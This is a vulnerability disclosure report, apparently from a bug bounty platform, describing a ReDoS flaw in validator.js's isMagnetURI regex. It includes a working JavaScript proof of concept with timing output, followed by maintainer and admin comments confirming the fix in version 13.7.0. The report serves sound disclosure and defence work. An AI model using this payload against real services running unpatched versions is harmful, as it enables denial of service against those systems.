Inefficient Regular Expression Complexity in validatorjs/validator.js

Valid

Reported on

Sep 17th 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.

It allows cause a denial of service when validating crafted invalid MagnetURIs.

The ReDoS vulnerability is mainly due to the sub-pattern .+&tr=.+ with quantified overlapping adjacency and can be exploited with the following code.

Proof of Concept

// PoC.js
var validator = require("validator")

for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = 'magnet:?xt=urn:a:'+'a'.repeat(32)+'&dn='+'&tr='.repeat(i*10000)+"\r\na\r\n";
    validator.isMagnetURI(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The Output

"attack_str.length: 40058: 464 ms"
"attack_str.length: 80058: 1717 ms"
"attack_str.length: 120058: 3864 ms"
"attack_str.length: 160058: 6871 ms"
"attack_str.length: 200058: 10895 ms"
"attack_str.length: 240058: 15493 ms"
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
Sarhan Aissi validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sarhan Aissi
a year ago

Maintainer


Thank you Yeting Li for reporting this ReDOS. A fix has been submitted and is awaiting merge!

Yeting Li
a year ago

Researcher


Hi, Sarhan, thank you for your confirmation. And I just checked that the fixed regex is safe.

Jamie Slome
a year ago

Admin


Same here! Once we have confirmed the fix, we can go ahead and publish a CVE on your behalf.

Thanks! 🎊

Yeting Li
a year ago

Researcher


Hi @admin, can you assign a CVE?

Jamie Slome
a year ago

Admin


@yetingli - thanks for the comment, we no longer assign CVEs to Inefficient Regular Expression Complexity.

We are doing this for our own internal quality and vetting process on reports before disclosing publicly via CVE.

Sarhan Aissi confirmed that a fix has been merged on 737694 a year ago
The fix bounty has been dropped
isMagnetURI.js#L3 has been validated
Sarhan Aissi
a year ago

Maintainer


Thank you guys! We finally released the fix in validator 13.7.0.

to join this conversation